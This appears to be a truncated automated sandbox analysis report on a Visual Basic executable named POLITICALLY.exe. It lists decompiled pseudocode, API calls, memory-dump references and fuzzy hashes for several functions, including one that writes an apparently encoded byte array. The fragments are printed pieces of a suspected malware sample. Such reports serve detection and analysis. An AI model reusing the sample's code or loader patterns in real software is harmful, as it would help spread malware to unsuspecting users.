Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#563CheckChkstkFreeHresult
String ID:
API String ID: 1669486024-0
Opcode ID: d3ecd77e1f8d2c44bfd8d5a93637b854db0ab290a43e54841345f3b3b13a0c20
Instruction ID: e30d862d42e9822e70fb01e9d1cefccb7e478652a392b9a6b8a9daae2f190e5b
Opcode Fuzzy Hash: d3ecd77e1f8d2c44bfd8d5a93637b854db0ab290a43e54841345f3b3b13a0c20
Instruction Fuzzy Hash: 34114F70900208AFCB00EFA6D945B9D7BB4EF04B45F50402AF501BB1A0DB7C9A85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042D261, Relevance: 7.6, APIs: 5, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0042D261(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char* _v32;
				char _v44;
				void* _v64;
				char _v76;
				signed int _t48;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				signed int _t60;
				signed int _t62;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				char* _t79;
				intOrPtr _t104;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(0x3c);
				L004015F0();
				_v12 = _t104;
				_v8 = 0x401480;
				L00401794();
				_push(0x11);
				_push(0x4037cc);
				_push( &_v44);
				L00401728();
				 *_v32 = 0x51;
				 *((char*)(_v32 + 1)) = 0x82;
				_t48 = 1;
				 *((char*)(_v32 + (_t48 << 1))) = 0x9c;
				_t50 = 1;
				 *((char*)(_v32 + _t50 * 3)) = 0xf5;
				_t52 = 1;
				 *((char*)(_v32 + (_t52 << 2))) = 0xe0;
				_t54 = 1;
				 *((char*)(_v32 + _t54 * 5)) = 0x6e;
				_t56 = 1;
				 *((char*)(_v32 + _t56 * 6)) = 0x4f;
				_t58 = 1;
				 *((char*)(_v32 + _t58 * 7)) = 0xbb;
				_t60 = 1;
				 *((char*)(_v32 + (_t60 << 3))) = 0x39;
				_t62 = 1;
				 *((char*)(_v32 + _t62 * 9)) = 0xa8;
				_t64 = 1;
				 *((char*)(_v32 + _t64 * 0xa)) = 0xf;
				_t66 = 1;
				 *((char*)(_v32 + _t66 * 0xb)) = 0x6d;
				_t68 = 1;
				 *((char*)(_v32 + _t68 * 0xc)) = 0x8c;
				_t70 = 1;
				 *((char*)(_v32 + _t70 * 0xd)) = 0xb0;
				_t72 = 1;
				 *((char*)(_v32 + _t72 * 0xe)) = 0x2f;
				_t74 = 1;
				 *((char*)(_v32 + _t74 * 0xf)) = 0xa5;
				_t76 = 1;
				 *((char*)(_v32 + (_t76 << 4))) = 0x60;
				asm("wait");
				_push(0x42d398);
				_v76 =  &_v44;
				_t79 =  &_v76;
				_push(_t79);
				_push(0);
				L00401722();
				L00401824();
				return _t79;
			}

0x0042d266
0x0042d271
0x0042d272
0x0042d279
0x0042d27c
0x0042d284
0x0042d287
0x0042d294
0x0042d299
0x0042d29b
0x0042d2a3
0x0042d2a4
0x0042d2ac
0x0042d2b2
0x0042d2b8
0x0042d2be
0x0042d2c4
0x0042d2cb
0x0042d2d1
0x0042d2d8
0x0042d2de
0x0042d2e5
0x0042d2eb
0x0042d2f2
0x0042d2f8
0x0042d2ff
0x0042d305
0x0042d30c
0x0042d312
0x0042d319
0x0042d31f
0x0042d326
0x0042d32c
0x0042d333
0x0042d339
0x0042d340
0x0042d346
0x0042d34d
0x0042d353
0x0042d35a
0x0042d360
0x0042d367
0x0042d36d
0x0042d374
0x0042d378
0x0042d379
0x0042d381
0x0042d384
0x0042d387
0x0042d388
0x0042d38a
0x0042d392
0x0042d397

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042D27C
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042D294
__vbaAryConstruct2.MSVBVM60(?,004037CC,00000011,?,?,?,?,004015F6), ref: 0042D2A4
__vbaAryDestruct.MSVBVM60(00000000,?,0042D398,?,004037CC,00000011,?,?,?,?,004015F6), ref: 0042D38A
__vbaFreeVar.MSVBVM60(00000000,?,0042D398,?,004037CC,00000011,?,?,?,?,004015F6), ref: 0042D392

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkConstruct2DestructFree
String ID:
API String ID: 1198663301-0
Opcode ID: 345df953888a772250f2af49a786def056734d8c7dc9a803aae81905c62a938f
Instruction ID: 2540316097699131df37242c4eab9315bfddb68b457367107712088a86c7e066
Opcode Fuzzy Hash: 345df953888a772250f2af49a786def056734d8c7dc9a803aae81905c62a938f
Instruction Fuzzy Hash: B1413671A442469ED725C764CCA2BADFF689B4A710F10415BF821EF6D2C6B9A843C330

Uniqueness

Uniqueness Score: -1.00%

Function 004331FC, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004331FC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v44;
				signed int _v48;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x1c);
				L004015F0();
				_v12 = _t40;
				_v8 = 0x401530;
				if( *0x435010 != 0) {
					_v44 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v44 = 0x435010;
				}
				_t26 =  &_v28;
				L0040180C();
				_v32 = _t26;
				_t29 =  *((intOrPtr*)( *_v32 + 0x1a8))(_v32, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v44)) + 0x310))( *_v44));
				asm("fclex");
				_v36 = _t29;
				if(_v36 >= 0) {
					_v48 = _v48 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x403568);
					_push(_v32);
					_push(_v36);
					L00401800();
					_v48 = _t29;
				}
				L004017FA();
				_push(0x4332c1);
				return _t29;
			}

0x00433201
0x0043320c
0x0043320d
0x00433214
0x00433217
0x0043321f
0x00433222
0x00433230
0x0043324a
0x00433232
0x00433232
0x00433237
0x0043323c
0x00433241
0x00433241
0x00433265
0x00433269
0x0043326e
0x00433279
0x0043327f
0x00433281
0x00433288
0x004332a4
0x0043328a
0x0043328a
0x0043328f
0x00433294
0x00433297
0x0043329a
0x0043329f
0x0043329f
0x004332ab
0x004332b0
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433217
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,004015F6), ref: 0043323C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004015F6), ref: 00433269
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,000001A8,?,?,?,?,?,?,?,004015F6), ref: 0043329A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,004015F6), ref: 004332AB

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: e18a8544b846a34f2f584e10ad5695580f92359a6392db315349edc66717a493
Instruction ID: bfe5f7d65768c4472689681a484c6fe4eb7d4e4ab304f45baa778df9e8d8039f
Opcode Fuzzy Hash: e18a8544b846a34f2f584e10ad5695580f92359a6392db315349edc66717a493
Instruction Fuzzy Hash: 4F114A75940208AFCB00EF95C846BEEBBB8BB0C715F10546AF011B72A0C77D56409F69

Uniqueness

Uniqueness Score: -1.00%

Function 0042D5EB, Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0042D5EB(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				signed int _v40;
				signed int _v48;
				char* _t23;
				signed int _t24;
				intOrPtr _t37;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_push(0x1c);
				L004015F0();
				_v12 = _t37;
				_v8 = 0x4014a0;
				_push( &_v36);
				L00401704();
				_t23 =  &_v36;
				_push(_t23);
				L0040170A();
				_v40 =  ~(0 | _t23 != 0x0000ffff);
				L00401824();
				_t24 = _v40;
				if(_t24 != 0) {
					_t24 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4);
					_v40 = _t24;
					if(_v40 >= 0) {
						_v48 = _v48 & 0x00000000;
					} else {
						_push(0x72c);
						_push(0x403224);
						_push(_a4);
						_push(_v40);
						L00401800();
						_v48 = _t24;
					}
				}
				_push(0x42d68f);
				return _t24;
			}

0x0042d5f0
0x0042d5fb
0x0042d5fc
0x0042d603
0x0042d606
0x0042d60e
0x0042d611
0x0042d61b
0x0042d61c
0x0042d621
0x0042d624
0x0042d625
0x0042d635
0x0042d63c
0x0042d641
0x0042d647
0x0042d651
0x0042d657
0x0042d65e
0x0042d67a
0x0042d660
0x0042d660
0x0042d665
0x0042d66a
0x0042d66d
0x0042d670
0x0042d675
0x0042d675
0x0042d65e
0x0042d67e
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042D606
#610.MSVBVM60(?,?,?,?,?,004015F6), ref: 0042D61C
#557.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 0042D625
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 0042D63C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403224,0000072C,?,?,?,?,?,?,004015F6), ref: 0042D670

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#557#610CheckChkstkFreeHresult
String ID:
API String ID: 1019139562-0
Opcode ID: 66e26888ca4708dff9ff7f6a7f21e2b098a6d759f4f11a56f294fb38343e0a5e
Instruction ID: c7f0d0801d1be05c90a4e3912bea9bc40965da19ff24a898fc7ec239b7650312
Opcode Fuzzy Hash: 66e26888ca4708dff9ff7f6a7f21e2b098a6d759f4f11a56f294fb38343e0a5e
Instruction Fuzzy Hash: 6C112E71D00218ABDF11EFA5CC05BEDBAB8EF08745F50407AF405B71A1D77D9A049A68

Uniqueness

Uniqueness Score: -1.00%

Function 004332DE, Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004332DE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v36;
				char _v44;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004015F0();
				_v16 = _t29;
				_v12 = 0x401540;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4015f6, _t26);
				_v36 = 1;
				_v44 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t18 =  &_v44;
				_push(_t18);
				L004016D4();
				L0040183C();
				L00401824();
				_push(0x433368);
				L0040182A();
				return _t18;
			}

0x004332e1
0x004332f0
0x004332fa
0x00433302
0x00433305
0x0043330c
0x0043331b
0x0043331e
0x00433325
0x0043332c
0x0043332e
0x00433330
0x00433332
0x00433334
0x00433337
0x00433338
0x00433342
0x0043334a
0x0043334f
0x00433362
0x00433367

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004332FA
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00433338
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00433342
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0043334A
__vbaFreeStr.MSVBVM60(00433368,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00433362

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#703ChkstkMove
String ID:
API String ID: 469383263-0
Opcode ID: 58554b74c97a70a266bfe6c4e796092ff82ad8063f1097da1ad6fcc2a655b120
Instruction ID: 7086819a492c6fcd898430b4967b19719b978ad186410f87e0776437cbdacb8c
Opcode Fuzzy Hash: 58554b74c97a70a266bfe6c4e796092ff82ad8063f1097da1ad6fcc2a655b120
Instruction Fuzzy Hash: E3012C71804208BBDB00EF95CD46FCEBBB5AB48764F24822AF4117B1E1DB789A44CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00433440, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00433440(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v32;
				char _v40;
				char* _t11;
				intOrPtr _t22;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t22;
				_push(0x28);
				L004015F0();
				_v12 = _t22;
				_v8 = 0x401560;
				_v32 = 2;
				_v40 = 2;
				_t11 =  &_v40;
				_push(_t11);
				L004016C8();
				L0040183C();
				L00401824();
				_push(0x4334af);
				L0040182A();
				return _t11;
			}

0x00433445
0x00433450
0x00433451
0x00433458
0x0043345b
0x00433463
0x00433466
0x0043346d
0x00433474
0x0043347b
0x0043347e
0x0043347f
0x00433489
0x00433491
0x00433496
0x004334a9
0x004334ae

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0043345B
#536.MSVBVM60(00000002,?,?,?,?,?,?,004015F6), ref: 0043347F
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,004015F6), ref: 00433489
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,004015F6), ref: 00433491
__vbaFreeStr.MSVBVM60(004334AF,00000002,?,?,?,?,?,?,004015F6), ref: 004334A9

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkMove
String ID:
API String ID: 2104488870-0
Opcode ID: 104e92b9213b06d78a36446c75451badb96be33c373e006898444ffc2395f6a0
Instruction ID: 1a41411326865caa999d4bfd7654c072fe8b812b204babddac5560126b244dd8
Opcode Fuzzy Hash: 104e92b9213b06d78a36446c75451badb96be33c373e006898444ffc2395f6a0
Instruction Fuzzy Hash: 1BF01D71840248AAD701EB91CD4ABAEB7B8EB04754F60442EF001771E1EBBD6F048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00433D09, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00433D09() {
				signed int _v8;
				signed int _t8;
				char _t10;
				signed int _t13;
				intOrPtr _t15;
				intOrPtr _t17;

				_push(4);
				L004015F0();
				_t8 = 1;
				_t13 = 1;
				_t15 =  *0x435034; // 0x625938
				_t17 =  *0x435034; // 0x625938
				_t10 =  *((intOrPtr*)(_t17 + _t8 * 0xffffffff));
				 *((char*)(_t15 + _t13 * 0xffffffff)) = _t10;
				_push( *0x435034);
				L004017B2();
				 *0x435040 = _t10;
				_v8 = _v8 | 0x0000ffff;
				 *0x435044 = _v8;
				return _v8;
			}

0x00433d0c
0x00433d0f
0x00433d17
0x00433d1d
0x00433d21
0x00433d27
0x00433d2d
0x00433d30
0x00433d33
0x00433d39
0x00433d3e
0x00433d43
0x00433d4c
0x00433d58

APIs

__vbaChkstk.MSVBVM60 ref: 00433D0F
#644.MSVBVM60 ref: 00433D39

Strings

8Yb, xrefs: 00433D21, 00433D27

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: #644Chkstk__vba
String ID: 8Yb
API String ID: 3537395942-503090003
Opcode ID: d0f4d178cf73f99cc39289348d7a16021de5a2830339007c2ab99dd8104fe5e3
Instruction ID: d3c8fd58ed2d2fe4548410c85a1d59fe1eb80165b08fc2e6b765a60193d1e382
Opcode Fuzzy Hash: d0f4d178cf73f99cc39289348d7a16021de5a2830339007c2ab99dd8104fe5e3
Instruction Fuzzy Hash: 28F0EC39142741A5C7286B64AD166987B74AF05750F10106AF601AF3F2D7715941D79C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: POLITICALLY.exe PID: 6976 Parent PID: 7124 POLITICALLY.exeCOMMON

Executed Functions

Function 1E279660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27966A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db27780d8ff1fbf1c632027ccfdc19740e25df4321527f81ab7ff4e3002ab707
Instruction ID: 3260ca81326d22bdc61300b42084de3ed01af3495784efc55a8d14ceee1698ba
Opcode Fuzzy Hash: db27780d8ff1fbf1c632027ccfdc19740e25df4321527f81ab7ff4e3002ab707
Instruction Fuzzy Hash: 1790027120100803D180716A8414E4E004957D1741FD1C115E0025618DCA558A5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 1E2796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E2796EA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a87b7d0e314f6e3be47dd671b4468411c67c989e3fe00605dbfa2a99386b8270
Instruction ID: bb5dea14a0d537b3a4bbe31a9414b57ec9145054566aa813bda4ae77bb5dfaa1
Opcode Fuzzy Hash: a87b7d0e314f6e3be47dd671b4468411c67c989e3fe00605dbfa2a99386b8270
Instruction Fuzzy Hash: 4690027120108803D110616AC414F4E004957D0741F95C511E442461CDC6D588957161

Uniqueness

Uniqueness Score: -1.00%

Function 1E279710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27971A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f3ed8903ef0250fb8419b5a520da52d71b432c40de485df469e8a71f46f594a
Instruction ID: 8e8fc3a04c1070f8217d69443eff1e03a0960104813b9643bf1839bdc5549ff2
Opcode Fuzzy Hash: 5f3ed8903ef0250fb8419b5a520da52d71b432c40de485df469e8a71f46f594a
Instruction Fuzzy Hash: 7B90027120100403D10065AA9418E4A004957E0741F91D111E5024519EC6A588957171

Uniqueness

Uniqueness Score: -1.00%

Function 1E2797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E2797AA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef4783197b89b54875215bfa672d1f1e57d98380f151da30b153d20b4b9c3e46
Instruction ID: ae6632aa2ccab852e29ac5e8310e9aea1794f3ee1f9e91a1047cd521f7202df8
Opcode Fuzzy Hash: ef4783197b89b54875215bfa672d1f1e57d98380f151da30b153d20b4b9c3e46
Instruction Fuzzy Hash: 8190027130100003D140716A9428E0A4049A7E1741F91D111E0414518CD955885A6262

Uniqueness

Uniqueness Score: -1.00%

Function 1E279780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27978A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1aa21caf8cb8bea913a26deb862ced8922fa53285a3f85cd4a61c5ffbdcb3466
Instruction ID: d5bcdade12a54d103edabe161616b6bc478179cbe40f839630521830761078a7
Opcode Fuzzy Hash: 1aa21caf8cb8bea913a26deb862ced8922fa53285a3f85cd4a61c5ffbdcb3466
Instruction Fuzzy Hash: D890027921300003D180716A9418E0E004957D1642FD1D515E001551CCC955886D6361

Uniqueness

Uniqueness Score: -1.00%

Function 1E279FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E279FEA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac1632e5f1e5a92fa09a797540e6a88b576e0dc5d99c76a629f68700a0ad5ae2
Instruction ID: 3af57b76883accc03e1980e8a85f62608f4e0fffbb3aba23385305274d6b6e07
Opcode Fuzzy Hash: ac1632e5f1e5a92fa09a797540e6a88b576e0dc5d99c76a629f68700a0ad5ae2
Instruction Fuzzy Hash: E790027131114403D110616AC414F0A004957D1641F91C511E082451CDC6D588957162

Uniqueness

Uniqueness Score: -1.00%

Function 1E279540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27954A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3eb340185e9bfb3a28177b117ebd917700df98ee974f338e7961a547bb38de00
Instruction ID: 7f315a4db41d66af58710114b6c4c38c1fdbb7b8ff2165118e10639fe16b7b72
Opcode Fuzzy Hash: 3eb340185e9bfb3a28177b117ebd917700df98ee974f338e7961a547bb38de00
Instruction Fuzzy Hash: 66900275211000030105A56A4714D0B008A57D5791391C121F1015514CD66188656161

Uniqueness

Uniqueness Score: -1.00%

Function 1E2795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E2795DA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19c55e9aa3a1f54a180b4feac6f940d7b4b11d5079a8e52c6475a8be8998ef30
Instruction ID: ff67644658c08b67faf73e3ec6ae39cbfee790734bdb4bf0df68cde120a9ef61
Opcode Fuzzy Hash: 19c55e9aa3a1f54a180b4feac6f940d7b4b11d5079a8e52c6475a8be8998ef30
Instruction Fuzzy Hash: C59002B1202000034105716A8424E1A404E57E0641B91C121E1014554DC56588957165

Uniqueness

Uniqueness Score: -1.00%

Function 1E279A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E279A2A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e7e33d686e140e36c2fe1b8b99e290fad0e6e9f59fa75f32b8597eb758d61b0
Instruction ID: 552b389eb41aa24ba718113080ac5668cc524f7780930b0f9e4bea80ffc855b4
Opcode Fuzzy Hash: 3e7e33d686e140e36c2fe1b8b99e290fad0e6e9f59fa75f32b8597eb758d61b0
Instruction Fuzzy Hash: 9A900271601000434140717AC854D0A40497BE1651791C221E0998514DC599886966A5

Uniqueness

Uniqueness Score: -1.00%

Function 1E279A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E279A0A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d392dd5a2f7fbd389a4e7d259bd021846cdb88485ff0d1c40addcca2ad557160
Instruction ID: eea23ca54931d6329b63a84afa8d62d554d356b726dd400796280920234f83a1
Opcode Fuzzy Hash: d392dd5a2f7fbd389a4e7d259bd021846cdb88485ff0d1c40addcca2ad557160
Instruction Fuzzy Hash: 2D90027120140403D100616A8824F0F004957D0742F91C111E1164519DC665885575B1

Uniqueness

Uniqueness Score: -1.00%

Function 1E279A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E279A5A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cef0efbc03a36128165c7c8a25b458a515f01f647bb9fe792d671a201c20e713
Instruction ID: 0c9c55ec8fde44f92630eec202c259a22d6df6672df06838ccd7ce2134a070aa
Opcode Fuzzy Hash: cef0efbc03a36128165c7c8a25b458a515f01f647bb9fe792d671a201c20e713
Instruction Fuzzy Hash: 8890027121180043D200657A8C24F0B004957D0743F91C215E0154518CC95588656561

Uniqueness

Uniqueness Score: -1.00%

Function 1E279860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27986A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a70f11b48db18142b026adfe4be962d00f48ac03a60a56166925d71360f907d
